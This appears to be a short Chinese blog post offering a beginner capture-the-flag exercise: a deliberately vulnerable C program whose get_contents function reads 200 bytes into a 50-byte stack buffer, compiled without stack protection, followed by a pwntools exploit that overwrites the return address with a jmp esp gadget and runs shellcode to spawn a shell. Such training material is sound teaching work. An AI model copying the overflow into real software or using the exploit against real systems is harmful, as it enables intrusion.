给学弟们练手的题目,做的过程中接触一些基本概念
#include <stdio.h> #include <unistd.h> int main() { char name[40]; welcome(); printf("enter your name\n"); read(STDIN_FILENO, name, 40); name[39] = ‘\x00‘; get_contents(); } void welcome() { printf("welcome to play the game!\n"); } void get_contents() { char contents[50]; puts("enter the contents you want to save:"); read(STDIN_FILENO, contents, 200); }
编译参数
-fno-stack-protector -z execstack -m32
题目是最简单的情况,不多加分析,下面直接给出exp
from pwn import * context(os=‘linux‘, arch=‘x86‘) #context.log_level=‘debug‘ # 0x80485e3 : jmp esp # offset: 66 jmp_esp = 0x80485e3 p = process(‘./a.out‘) #gdb.attach(p) p.sendlineafter(‘name\n‘, ‘a‘) p.sendlineafter(‘save:\n‘, ‘a‘*62 + p32(jmp_esp) + asm(shellcraft.sh())) p.interactive()
原文:http://www.cnblogs.com/junmoxiao/p/5931170.html